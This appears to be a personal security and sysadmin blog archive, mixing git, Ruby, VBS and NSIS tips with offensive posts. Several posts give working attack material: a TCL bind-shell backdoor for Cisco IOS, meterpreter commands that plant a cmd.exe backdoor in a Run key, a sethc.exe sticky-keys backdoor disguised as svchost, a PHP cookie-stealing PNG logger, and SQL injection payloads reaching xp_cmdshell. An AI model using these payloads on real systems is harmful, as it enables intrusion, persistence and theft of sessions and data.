codeBurst

2011-11-03T15:31:00.001Z

bin/git-truncate 33174e010f5c586ecd89ce47067f796b751989f5


#!/bin/bash
# usage: git-truncate refhashtag
git checkout --orphan temp $1
git commit -m "Truncated history"
git rebase --onto temp $1 master
git branch -D temp

2011-10-27T13:39:00.001Z

I've been using git for a while and forget some things.. so for the sake of repeating the internet.

Revert Working Copies

For a specific file use:

git checkout path/to/file/to/revert

For all unstaged files use:

git checkout -- .

Make sure to include the period at the end.

Merge in remote

git checkout master
git remote add username git://github.com/username/repo.git
git fetch username
git merge username/master-or-branch-name
git push origin master

Update existing remote

shadowbq@thaw:~/snorby_suite$ git remote
origin
shadowbq@thaw:~/snorby_suite$ git fetch origin
remote: Counting objects: 5, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 3 (delta 2), reused 0 (delta 0)
Unpacking objects: 100% (3/3), done.
From github.com:shadowbq/snorby_suite
   33174e0..7109d83  master     -> origin/master
shadowbq@thaw:~/snorby_suite$ git merge origin/master
Updating 33174e0..7109d83
Fast-forward
 TODO.md |   14 +++++++-------
 1 files changed, 7 insertions(+), 7 deletions(-)

2010-02-22T13:16:00.001Z

A quick look at object_id in ruby..

Ruby VALUEs and object_ids @oreillynet has a detailed explanation about the assignment method.

irb(main):001:0> "".object_id
=> 23653260
irb(main):002:0> "".object_id
=> 23649800
irb(main):003:0> 1.object_id
=> 3
irb(main):004:0> 0.object_id
=> 1
irb(main):005:0> 2.object_id
=> 5
irb(main):006:0> true.object_id
=> 2
irb(main):007:0> false.object_id
=> 0
irb(main):008:0> nil.object_id
=> 4
irb(main):009:0> @foo = 1
=> 1
irb(main):010:0> @foo.object_id
=> 3
irb(main):011:0> @foo.object_id
=> 3
irb(main):012:0> @foo = " "
=> " "
irb(main):013:0> @foo.object_id
=> 23612570
irb(main):014:0> @foo.object_id
=> 23612570

pcaprub

2010-02-11T17:29:00.000Z

Pcaprub was very fractured throughout the ruby community so I merged many of the projects together. This is the new hotness. :)

gem install pcaprub

Requirements:

libpcap - http://www.tcpdump.org

http://github.com/shadowbq/pcaprub

VBS Script to map NAS network smb drives over specific SSID wifi homenets (non GPO script)

2009-08-05T12:09:00.001Z

I recently posted this script on usenet because some many people now
have NAS storage devices accessible via there home wifi networks.

This script should help out the people with the question on how to mount a network attached storage device (like my coolmax NAS) to there windows profile during windows boot.

This vbs works by utilizing the wmi and cimv2 mappings to access the the MSNdis_80211_Configuration and the Win32_NetworkAdapter references.

You need to have the local WMI service enabled for this to work.

FYI:This has been tested under Windows XP.

'file: nasmapper.vbs
'launch with "cscript c:\nasmapper.vbs //nologo" -> /programs/startup
'VBS Script to map NAS over wifi homenets (non GPO script)

'Shadowbq - 2009 BSD License
'Reference Functions: ScriptGuy! (MS)
', quiet_lurker (neowin), Aaron P(neowin)

Option Explicit

Dim objWMIService, objNet
Dim intSleep, WNICName, knownSSID, retries, maxRetries
Dim mapDrive, mapLocation, mapUsername, mapPassword

knownSSID="URWP80" 'SSID of Hotspot that has mapped location
WNICName="Dell Wireless 1470 Dual Band WLAN Mini-PCI Card"
'Nic name listed in WMI
maxRetries = 10
'maxRetries * intSleep/1000 ~= total possible seconds
intSleep = 2000 'wait cycles
mapDrive = "Y:" 'Map to Drive
mapLocation = "\\storage\public" 'Location of Share
mapUsername = "Guest" 'User Account for Share
mapPassword = "" 'User Password for Share

'If your having problems finding the WNICName you can use the
'\\root\wmi call to ("Select * From MSNdis_80211_Configuration") flip
' through all wireless devices..

Private Sub GetWMI(WMIArray, WMIQuery, WMIRoot)
'On error resume Next
DIM WMIClass

Set WMIClass = GetObject("winmgmts:{impersonationLevel=impersonate}!\_
\.\root\" & WMIRoot)
If not(WMIClass is nothing) Then Set WMIArray = WMIClass.ExecQuery_
(WMIQuery)

End Sub

Function SSID()
'On error resume Next
DIM objSSIDSet, objSSID, ID, i

Call GetWMI(objSSIDSet, "Select * from_
MSNdis_80211_ServiceSetIdentifier Where active=true", "wmi")

For Each objSSID in objSSIDSet
ID = ""

For i = 0 to objSSID.Ndis80211SsId(0)
ID = ID & chr(objSSID.Ndis80211SsId(i + 4))
Next

SSID = ID
Next
End Function

Function WNICStatus()
Dim colItems, objItem, strStatus

Call GetWMI(colItems, "Select * from Win32_NetworkAdapter where Name_
= '" & WNICName & "'", "cimv2")

For Each objItem in colItems
Select Case objItem.NetConnectionStatus
Case 0 strStatus = "Disconnected"
Case 1 strStatus = "Connecting"
Case 2 strStatus = "Connected"
Case 3 strStatus = "Disconnecting"
Case 4 strStatus = "Hardware not present"
Case 5 strStatus = "Hardware disabled"
Case 6 strStatus = "Hardware malfunction"
Case 7 strStatus = "Media disconnected"
Case 8 strStatus = "Authenticating"
Case 9 strStatus = "Authentication succeeded"
Case 10 strStatus = "Authentication failed"
Case 11 strStatus = "Invalid address"
Case 12 strStatus = "Credentials required"
End Select
Next

WNICStatus = strStatus
End Function

Function fnMapNetworkDrive (Drive, Path, Uname, Upass)
Dim i, oDrives
set objNet = Wscript.CreateObject("Wscript.Network")
Set oDrives = objNet.EnumNetworkDrives
For i = 0 to oDrives.Count - 1 Step 2
' Find out if an existing network drive exists
If oDrives.Item(i) = Drive Then
WScript.Echo "Removing drive: " & Drive
objNet.RemoveNetworkDrive Drive, true, true
End If
Next
WScript.Echo "Mapping drive: " & Drive & " to path: " & Path
objNet.MapNetworkDrive Drive, Path, false, Uname, Upass
fnMapNetworkDrive = "[completed mapping drive]"
Set i = Nothing
Set oDrives = Nothing
Set Drive = Nothing
Set Path = Nothing
End Function

Dim nicStatus, nicSSID

WScript.Echo "NAS Wifi Mapper"
WScript.Echo "=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
WScript.Echo "[Checking NIC Status]"

nicStatus = WNICStatus()
retries = 0

while (StrComp(nicStatus, "Connected") <> 0)
If (retries < maxRetries) Then
retries = retries + 1
Wscript.Echo "Nic " & nicStatus & ".."
Wscript.Sleep intSleep
nicStatus = WNICStatus()
Else
Wscript.Error "*** Max # of connection attempts reached"
End If
Wend
Wscript.Echo "Connected .. continuing"

WScript.Echo "[Checking SSID Status]"
nicSSID = SSID()
nicSSID = Left(nicSSID, len(nicSSID)-1)

Wscript.Echo "SSID: " & nicSSID

If (StrComp(nicSSID, knownSSID) = 0) Then
Wscript.Echo "[Correct SSID]"
Else
On Error Resume Next
Dim errDescription, errSource
errSource = "NAS Mapper"
errDescription = "Incorrect SSID for network share to be established"
Wscript.Echo "An Error:'" & errDescription & "' by '" & errSource &_
"'."
WScript.Quit 8
End If

WScript.Echo "[Mapping Drive] "
Wscript.Echo fnMapNetworkDrive (mapDrive, mapLocation, mapUsername,
mapPassword)

WScript.Quit

Command Line Capistrano Forked

2008-09-26T15:49:00.003Z

#!/usr/local/bin/ruby

# Command Line Capistrano Forked
# (Forked version)
# written by Scott MacGregor - 2008

require 'rubygems'
require 'capistrano/configuration'
require 'stringio'
require 'optparse'
require 'syslog'

#Gather list of hosts and create capistrano role string
def monitorlist(hostlist)
commandstring = "role :sensor, "
if hostlist.respond_to? :last
hostlist.each do |hosttarget|
hosttarget == hostlist.last ? commandstring << "\"#{hosttarget.strip}\"" : commandstring << "\"#{hosttarget.strip}\", "
end
else
commandstring << "\"#{hostlist.strip}\""
end
return commandstring
end

#Perfom desired login method
def logit (outputIO, logmethod)
if logmethod
Syslog.open('monitord')
outputIO.string.each {|line|

#ignore monitord information lines
if line.include?("\[monitord\]")
next
end

#strip out tty special characters
# ^\[[33m
line.gsub!(/\^\[\[[0-9]+m/,"")
# \e[37m
line.gsub!(/\e\[[0-9]+m/,"")
# \033[31m
line.gsub!(/\\[0-9]+\[[0-9]+m/,"")

#strip out preceding stars
line.gsub!(/^\s*[*]*/,"")

line.strip!

#uncomment this line if you want STDOUT while SYSLOGING
#p line

if line.downcase.include?("fail")
Syslog.crit(line)
else
Syslog.notice(line)
end
}
end
end

# Run Forked Process
def tick(queryhost, outputIO, logmethod)
pid = fork {

pidhost = Capistrano::Configuration.new
if OPTIONS[:syslog]
pidhost.logger = Capistrano::Logger.new(:output => outputIO)
else
pidhost.logger = Capistrano::Logger.new
end
pidhost.load(File.dirname(File.expand_path(__FILE__)) + "/capfile")
pidhost.load(:string => monitorlist(queryhost.strip))

# pidhost.set :user, 'capistrano'
# pidhost.ssh_options[:username] = monitord'
# pidhost.ssh_options[:host_key] = 'ssh-dsa'
# pidhost.ssh_options[:paranoid] = false

pidhost.logger.level = OPTIONS[:debug_level]
begin
#Call the Capistrano Namespace & command to fork
pidhost.monitor.default
rescue Exception => e
puts "\t[" + queryhost.strip + "] " + " Failed to establish connection."
outputIO.puts "\t[" + queryhost.strip + "] " + " Failed to establish connection."
end

logit(outputIO, logmethod)

}
Process.waitpid(pid, Process::WNOHANG)
end

# Set default options and initializations
OPTIONS = {
:file => "monitorlist",
:syslog => false,
:debug_level => 0,
:dest => File.expand_path(File.dirname($0)),
:hostslist => ""
}
hosts=[]

#Read Command Line Options
ARGV.options do |o|
script_name = File.basename($0)

o.set_summary_indent(' ')
o.banner = "Usage: #{script_name} [OPTIONS]"
o.define_head "Run capistrano command forked from outside capistrano with additional options.\nWritten by: Scott MacGregor 2008"

o.separator ""
o.separator "Monitord options:"
o.on("-R", "--read=[val]", String,
"Read monitor host list from file",
"Default: #{OPTIONS[:file]}") { |OPTIONS[:file]| }
o.on("-L", "--hosts=[val]", String,
"List of comma seperated hosts. Encased in double quotes.", "(*OVERRIDES -R option)" ) { |OPTIONS[:hostslist]| }
o.on("-S", "--syslog",
"SYSLOG all output") { |OPTIONS[:syslog]| }

o.separator ""
o.separator "Common Usage: "
o.separator "\t./monitord --hosts=\"hostname1, hostname2\""
o.separator "\t./monitord -R \"customhosts.txt\""

o.separator ""
o.separator "Common options:"
o.on("--debug=[0-3]", Integer,
"Debug verbosity level",
"Default: #{OPTIONS[:debug_level]}") { |OPTIONS[:debug_level]| }
o.on_tail("-h", "--help", "Show this help message.") { puts o; exit }

begin
o.parse!
rescue OptionParser::InvalidOption => e
abort "-h --help Show this help message."
end

end

if OPTIONS[:hostslist] == ""
#Read standard Capistrano Role string configuration file.
File.open(File.dirname(File.expand_path(__FILE__)) + "/#{OPTIONS[:file]}").each { |line|
hosts = line[(line.index(",")+2)..-1].gsub("\"","").strip.split(',') if not line =~ /^\s*#/
}
else
#Read env option string
hosts = OPTIONS[:hostslist].split(',')
end

# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#Begin Main Loop

outputIO = StringIO.new
logmethod = OPTIONS[:syslog]

for host in hosts
tick(host.strip, outputIO, logmethod)
end

# End Main Loop
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DNS version attempts & tools

2008-07-28T18:16:00.005Z

There has been some DNS junk flying around again.. so refresh.

Dont forget how easy it is to do a DNS version attempt.

dig @ns.example.com -c CH -t txt version.bind

Make sure your BIND/Named is obfuscated/disabled with custom message..

options
{
version "Generic DNS Server";
}

Not that it helps much with fpdns around.

anonymous@:~$ fpdns -D google.com
fingerprint (google.com, 216.239.34.10): ISC BIND 8.3.0-RC1 -- 8.4.4
fingerprint (google.com, 216.239.36.10): ISC BIND 8.3.0-RC1 -- 8.4.4

Perl: (Fingerprint.PM)

Make sure your read basic DNS information like

Cisco's: DNS Best Practices, Network Protections, and Attack Identification

And understand the principles laid out in Secure BIND configurations such as:
http://www.cymru.com/Documents/secure-bind-template.html

Look into DNS Debug tools such as DNSwalk, dlint, & DOC

And for reverse lookups use where there is no PTR record try A record caches like:
Passive DNS Replication @
http://cert.uni-stuttgart.de/stats/dns-replication.php

Simple http get request... snooze.

2008-06-05T15:02:00.005Z

Lets get some basic headers using sbd.exe, nc, telnet whatever..

telnet www.microsoft.com 80
nc www.microsoft.com 80
sbd -c off www.microsoft.com 80

GET / HTTP /1.1
Host: www.microsoft.com
Press Enter twice

(Windows telnet lameness.. Turning on local echo..)

Type "Ctrl+]"
Type "set localecho"
Press Enter twice

Digg + Idiots + RapidShare = p0wn3d

2008-04-27T04:51:00.006Z

God damn it.. dumb ideas just stay around for far too long.

Ok we all know what the hell rapidshare is. It's a waste of internet space. One thing though a couple of years ago somebody dugg an article on a way to get around restrictions using a server script called rapidleech. Ok all in good fashion, but come on... you leave this open on apache server which can process php files.. and allow public upload to your server from any url.. (r57.php c99/100.php the list just goes on and on.. ) Renaming the file really helped huh..?

Just look at the multiversion google dork:
[2 years later and still 117+ zombies waiting to happen]
"Bugs Report to Rapidget.bug"

Digg idiots: http://digg.com/tech_news/RapidLeech

Capistrano with highline menu.

2008-04-16T21:05:00.002Z

Example Capistrano file using the highline menu system..

(Capistrano really needs some better docs.)

#example capistrano menu using highline menu system
# Published under BSD license
# written by:shadowbq - http://shad0wbq.blogspot.com
# verified on: capistrano 2.2.0 & highline 1.4.0

role :comps, "localhost"

desc "Example Highline menu"
task :menu do
Capistrano::CLI.ui.say("\nThis is with a different layout...")
Capistrano::CLI.ui.choose do |menu|
menu.layout = :one_line

menu.header = "Execute"
menu.prompt = "Application? "

menu.choice :hello do
helloworld
end
menu.choices(:skip, :exit) do
Capistrano::CLI.ui.say("Choose not to run..")
end
end

end

task :helloworld do
run "echo helloworld."
end

Mozilla Prism & Pen-testing

2008-03-25T14:57:00.008Z

Mozilla Prism , one in a series of recent site-specific-browsers(ssb) has become a fairly useful tool for me. I can run the web applications under different users (run as.. ). This allows limiting access and resources to the web application. It also allows running multiple different cookie sets at one time.

Simple example is having multiple gmail accounts logged in at one time. A more complex example is cookie manipulation while authenticated during access level enumeration.

Prism allows for the fine tuning of ssb to accommodate multiple pentesting angles.In the past I've rebranded Firefox and done similar things as running as guest users, but it was never this easy.

Prism and Flash on Windows
Its is pretty simple to enable your plugins (not talking extensions here.. ) on Prism on a windows system. All you have to do is copy your {program files}\Mozilla Firefox\plugins directory to your {program files}\Prism\Plugins directory. The Prism plugins directory doesnt exist by default and needs to be created. You may also want to copy the files into the XULRunner plugins directory. XUL runner handles any XUL apps that may depend on those plugins as well.

Shell code for IOS using TCLSH on Cisco devices..

2007-11-28T16:36:00.000Z

An nice article that went out by IRM talked about simple way to create TCL backdoor for cisco IOS. You can read the white paper here.
Oops: didnt known what I was sourcing..

Router>en
Router#tclsh
Router(tcl)#source tftp://tftpserver/tclsh.tcl

Source:

# TclShell.tcl v0.1 by Andy Davis, IRM 2007
#
# IRM accepts no responsibility for the misuse of this code
# It is provided for demonstration purposes only
proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " "
puts $sock "-------------------------------------"
puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"
puts $sock "-------------------------------------"
puts $sock " "
set response [exec "sh ver | inc IOS"]
puts $sock $response
set response [exec "sh priv"]
puts $sock $response
puts $sock " "
puts $sock "Enter IOS command:"
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
}
}
set port 1234
set sh [socket -server callback $port]
vwait var
close $sh

All material is IRM's, this is just a snippet from the article.

Low hangin fruit

2007-11-19T15:15:00.000Z

Hacking old skool windows..

Notes from a CEH. Nothing new, but at least the basic are covered. This all should be automated by some wrapper so you don't waste time.. Generally you could do all this in Backtrack or similar builds.

http://hackathology.blogspot.com/2007/06/hacking-old-skoolz-windows.html

RSS / ATOM - Security Tagging Framework for Yahoo PIPES

2007-11-16T16:48:00.000Z

I've been using YAHOO pipes for awhile to help filter some of the junk on full disclosure. Tagging became part of my daily habits so I thought it most appropriate to create auto taggers so I can read / filter much more quickly.

Security Tagging FrameWork

The basics of the PIPE is an array of regular expressions that strip off unneccessary titles, duplicates, responses, and add Pre-titles such as {Vulnerability}{Web-based}.

Ive also created an example on how to use the framework with existing YAHOO-PIPES.

Vulnerability Watch++ (Security Tagging Framework Example)

This PIPE aggregates two feeds and uniques them, and tags them utilizing the framework twice.

Side note:

GNUCitizen posted two nice articles on PIPES and their flexibility to be utilized with JSON database.

1. 5-generic-yahoo-pipes-hackers-cannot-live-without

2. Project Renaissance

QRcode - semanatic posting...

2007-07-11T17:52:00.000Z

Email: r@qry.jp

QRcode decoding through the web... enjoy the robot.

SQL injection information and tools

2007-06-20T18:50:00.000Z

Wow.. there's been a blow up recently on SQL injection tools and root kits. This has been a great boom over the older semi-dead projects.

Ive found the perl blind SQL bf tools to be most helpful in scanning.
http://www.514.es/download/bsqlbfv1.2-th.pl

Here was a quick shot of other multiple sql tools
http://www.unsec.net/2006/11/herramientas_sql_injection.html

The OWASP one always needs some help SQLiX ..
http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project

Current updated list of SQL injection tools
http://www.security-hacks.com/2007/05/18/top-15-free-sql-injection-scanners

Argeniss - Great indepth data and such
Hacking Databases for owning your data (Full root kits for oracle and tsql)
http://www.argeniss.com/research.html

Building NSIS Installers for Large File Distributions

2007-05-10T21:55:00.000Z

I've been working on some solutions recently to distribute large data sets utilizing numerous compressed files groups. I decided the best way to dummy proof this was to wrap an installer around them and do it "right". So here is how to do that with an installer.

If you need to install, with only one setup application, two or more tar, bz2, gz, or lzma compressed files (for example multiple clustered files of over 2GB containing scientific data for your application and a couple others containing the app, and maybe a required piece of library software like winpcap) you need a robust solution such as the Nullsoft Install System - NSIS.

The most logical idea is to create a single file, but NSIS does have file size limitations within it's compiler. Currently it is about 2GB in size. So deploying a package of say 8GB (something that might normally fit on a Dual Layer DVD) is not possible with standard NSIS single file installers. This solution uses external plugins to decompress the files within the same directory framework as the installer. This allows you to create large file distributions that could be delivered on large media or across gigabit speed networks.

Tools Req:

7zip [installer] - Compression Utility
Notepad++ [installer] - IDE
NSIS [installer]
UltraModernUI NSIS User Interface [installer] - personal choice of GUI for NSIS installer
Untgz Contrib plugin [installer] - Decompression library

Files to Distrubute:
compressed_1.tar
-- decomp_set1of5_file1of2.txt
-- decomp_set1of5_file2of2.txt
compressed_2.tar
-- decomp_set2of5_file1of3.txt
-- decomp_set2of5_file2of3.txt
-- decomp_set2of5_file3of3.txt
compressed_3.tar
-- decomp_set3of5_file1of2.txt
-- decomp_set3of5_file2of2.txt
compressed_4.tar
-- decomp_set4of5_file1of1.txt
compressed_5.tar
-- decomp_set5of5_file1of3.txt
-- decomp_set5of5_file2of3.txt
-- decomp_set5of5_file3of3.txt

1
2
3 !include LogicLib.nsh
4
5 Function .onInit
6 # Section Size must be manually set to the size of the required disk space NSIS will not do this for external files.
7 # set required size of section number of kilobytes
8 # 8gb to kilo bytes = 8,388,608
9 SectionSetSize ${SecDecompress} 8388608
10
11;compressed_#.taz has be in the same directory as the Setup file.
12${If} ${FileExists} "$EXEDIR\compressed_1.tar"
13${AndIf} ${FileExists} "$EXEDIR\compressed_2.tar"
14${AndIf} ${FileExists} "$EXEDIR\compressed_3.tar"
15 ${AndIf} ${FileExists} "$EXEDIR\compressed_4.tar"
16 ${AndIf} ${FileExists} "$EXEDIR\compressed_5.tar"
17 Return
18 ${Else}
19 MessageBox MB_OK|MB_ICONINFORMATION "This copy of the installer is missing a compressed#.tar file.." IDOK abort
20 abort:
21 Banner::destroy
22 Abort
23 ${EndIf}
24
25 FunctionEnd
26
27 Section -decompress SecDecompress
28
29 ;UnTGZ Plugin
30 ;compressed_#.tar in this example is not compressed by gzip just tar collection
31 ; untgz plugin requires -znone to denote this
32
33 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_1.tar"
34 ${If}${FileExists} "$INSTDIR\decomp_set1of5_file1of2.txt"
35 ${AndIf} ${FileExists} "$INSTDIR\decomp_set1of5_file2of2.txt"
36 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_2.tar"
37 ${AndIf} ${FileExists} "$INSTDIR\decomp_set2of5_file1of3.txt"
38 ${AndIf} ${FileExists} "$INSTDIR\decomp_set2of5_file2of3.txt"
39 ${AndIf} ${FileExists} "$INSTDIR\decomp_set2of5_file3of3.txt"
40 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_3.tar"
41 ${AndIf} ${FileExists} "$INSTDIR\decomp_set3of5_file1of2.txt"
42 ${AndIf} ${FileExists} "$INSTDIR\decomp_set3of5_file2of2.txt"
43 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_4.tar"
44 ${AndIf} ${FileExists} "$INSTDIR\decomp_set4of5_file1of1.txt"
45 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_5.tar"
46 ${AndIf} ${FileExists} "$INSTDIR\decomp_set5of5_file1of3.txt"
47 ${AndIf} ${FileExists} "$INSTDIR\decomp_set5of5_file2of3.txt"
48 ${AndIf} ${FileExists} "$INSTDIR\decomp_set5of5_file3of3.txt"
49 Goto EverythingOk
50 ${Else}
51 MessageBox MB_OK|MB_ICONEXCLAMATION "Installation Failure. Media may be corrupt." IDOKabort
52 abort:
53 Banner::destroy
54 Abort
55 ${EndIf}
56 EverythingOK:
57
58 ;If tar files were packaged into the setup you can delete it like this :)
59 ;Delete "$INSTDIR\compressed#.taz"
60
61 SectionEnd

Session redirect in php and asp

2007-04-03T16:03:00.000Z

These are examples of correct ways to handle access and redirects in sessions in asp(1.0|vbs) & php.. I dont know how may times I see this done wrong..

ASP example

<%
If NOT Session("Authenticated") = 1 Then
Response.Redirect ("login.asp")
'Response.Redirect ("login.asp", true); '<= This is the same as the default
'Exit ' <= This is called with default True statemens as above
End If
%>

PHP Example

<?PHP
if ($_SESSION['access'] != "yes")
{ header(Location:login.php); /* Redirect browser */
exit; /* Make sure that code below does not get executed when we redirect. */
}
//Code Following Should not be executed unless authenticated.
echo ("secure code");
?>

Note: Since PHP 4.4.2 and PHP 5.1.2 this function prevents more than one header
to be sent at once as a protection against header injection attacks.

Month of ... bugs

2007-03-30T20:52:00.000Z

1. Month of browser bugs
2. Month of apple bugs
3. Month of kernel bugs
4. Month of PHP bugs
5. Month of MySPACE bugs

eh.. ergg.. cough.. die. this fad is getting old.. I hate even commenting on this at all.

Setting and Confirming reg keys w/meterpreter.

2007-03-28T22:09:00.000Z

super quick meterpreter sequence
Prep

upload c:\\sbdbg.exe c:\\windows\\system32\\

Set

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor -d "C:\\windows\\system32\\sbdbd.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0"

Verify

reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor

Use

(reboot)

Comparing Common Vulnerability Result Sets

2007-03-23T05:16:00.000Z

One of the major things I've been working on is bring together vulnerability result information. I found that it was a major pain in ass to be able to remove duplicate entries from result sets. I was finally able to come up with listing for based on CVE / BID tracking numbers:

An example corresponding file could be something like this

Tenable Nessus 3.0 - to - Harris Guardian Scanner [download txt]

Just extracting Nessus Information can be a huge problem. Because of the lack of structure within the nasl scripting language, there are many many variations on the output generated by the plugins. I've made some additional changes to an old tool.

nessus_extract.pl (version 1.7) [download perl]

I added pipes into the fray, generating a recursive style csv to separate BID and CVE numbers as well as a more robust double-quote word qualifier.

One huge help is the Open Source Vulnerability Data Base (osvdb) which has come a long way.

Pentest Order of Objects..

2007-03-15T21:06:00.001Z

ISSAF was used in conjuction with the latest backtrack release.
Although it is not my company's standard it is quite close.

Not to be too open.. but this has lead to a really good idea for object orient coding.

Information Systems Security Assessment Framework (ISSAF) draft 0.2
ASSESSMENT

INFORMATION GATHERING
-Archive
-DNS
-Route
-SMTP
-Searchengine
-Survey
-Whois
NETWORK MAPPING
-Identify Live Hosts
-OS-Fingerprinting
-Portscanning
-Service Fingerprinting
-Identify Border Assets
-(SNMP - MIB Browsing)
-(VPN)
-Web/Public Application Mapping(Crawling)
VULNERABILITY IDENTIFICATION
-(Cisco)
-Database
-Fuzzers
-SMB Analysis
-SNMP Analysis
-Security Scanner
-Web Analysis
PENETRATION
-Exploits (metasploit)
-Exploits (CoreImpact / Canvas)
-Exploits (milworm /secfocus)
GAINING ACCESS AND PRIVILEGE ESCALATION
-Password Attacks
-Default Conf Attacks
-Sniffers
-Spoofing
ENUMERATING FURTHER
-Management Infrastructure (ie. WMI,SNMP,CDP)
-Pull Passwords (hashes, SAM FILES)
-Priviledged Assessment(Repeat all Steps)
COMPROMISE REMOTE USERS/SITES
-Targeted Phishing
-DNS Poisoning
MAINTAINING ACCESS
-Covert Channels
-Rootkits
-Portknocking
-Proxy
-Tunnels
COVER THE TRACKS
-House Cleaning

SBD as netcat

2007-03-13T15:51:00.001Z

Yeah so I rattle off some SBD stuff sometimes.. Im referring to the netcat clone called sbd. SBD is Shadowinteger's Backdoor located @ http://tigerteam.se/dl/sbd/. This is my perferred "swiss army knife" because of its default configuration of encryption(AES-CBC-128 + HMAC-SHA1 encryption) and dangerous execution binding (-e command).

Netcat and its NC Clones:

netcat - "swiss army knife"
sbd & sbdbg.exe - shadowinteger's backdoor
netcat6 - swiss army knife+ for ipv6
cryptcat - netcat with twofish encryption
socat - Multipurpose relay(netcat++) IPV6/SSL Example usage:
socat TCP6-LISTEN:8080,reuseaddr,fork PROXY: proxy:www.domain.com:80

Simpler tools:

nc.pl - perl netcat-like implementation
netcopy - reciever
netsend - transmitter for netcopy
urocat - simple cat clone

None of this is news.. I just wanted to point out some of this simple stuff.

sbd fun as a rookit via sethc.exe

2007-03-08T19:57:00.001Z

SBD Fun

Transfering files

RCV: sbd -l -p 4337 > outputfile
XMIT: cat infile | sbd 127.0.0.1 4337 –q 10

Transfering files through .tar.gz

RCV: sbd -l -p 4337 | tar xvfpz –
XMT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337

PORT Scan:

echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000

Using Cmd.exe to bind to service
In my experience this is flaky at best..

create then start service:

sc create testsvc binpath= "cmd /K start" type= interact
sc start testsvc

Note that this time, the SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).

SCM starts a service
RegisterServiceCtrlHandler API

We may want to fix any C program to actually handle the correct calls if loading them as a legitimate service.

Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost in this example.)

#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
// Lets restrict address to localhost only.. pls.
system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
return EXIT_SUCCESS;
}

Rootkit portion
Rename output binary to sethc.exe .. works ok.

Prefetch restrictions.
Remember to delete any exisiting sethc.exe files in c:\windows\prefetch prior to use.

Interesting Note about RDC
Sticky Keys [left-shift x5](sethc.exe) works through Remote Desktop Connections(RDC/RDP). Funny how suddenly that makes this all the more interesting.

Apparently the SYSTEM Kernel security shuts down all unknown process on sweep @5 minutes into session.

Can there fake handler for WM_CLOSE? or terminate...

PNG Listener w/logger

2007-03-07T20:52:00.000Z

This is an example of a simple PNG listener with a logging mechanism.
(Do I really have to explain how to use this?)

<?php
$cookie = $_GET["c"];
if ($cookie == "init")
{$file = fopen('001.txt', 'w');
fwrite($file, ":: 00* Logger:: \n");
}
else{
$file = fopen('001.txt', 'a');
fwrite($file, $_SERVER['REMOTE_ADDR']."=>".$cookie . "\n");
}
header("Content-type: image/png");
$im = imageCreate(1,1);
$background = imageColorAllocate($im, 255, 255, 255);
imagePNG($im);
imageDestroy($im);
}
?>

I developed this snippet while working on a solution for browser history leaks.

SQL injection and identification

2007-03-07T16:20:00.000Z

Identify sql Server through Blind SQL injection

http://example.com/index.php?some_var=1/*!40017%20s*/

MySQL is at least 4.0.17 if you get a different result.

## String based (concat ||) ==> PostgreSQL, Oracle
## String based (concat +) ==> MS-SQL, MS-Access

Normal Union attack

$var$quote_type AND 1=1;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--

MS-SQL

Check if we are admins

IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))

Check things like
MSSQL_OPENQUERY

(select 1 from OPENQUERY([$servername],'select 1'))

MSSQL_OPENROWSET

(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))

(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))

If we have a linked server and sa

select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

If already sa

select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')
select * from OPENROWSET('SQLOLEDB','';;,'select @@version')

Other things todo

select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

reverse-shell from SQL server

2007-03-06T22:01:00.000Z

So you go the super secret sa password (or they left it blank~?)

osql -Daaa -Usa -Psupersecret -Q "[valid sql statement]"

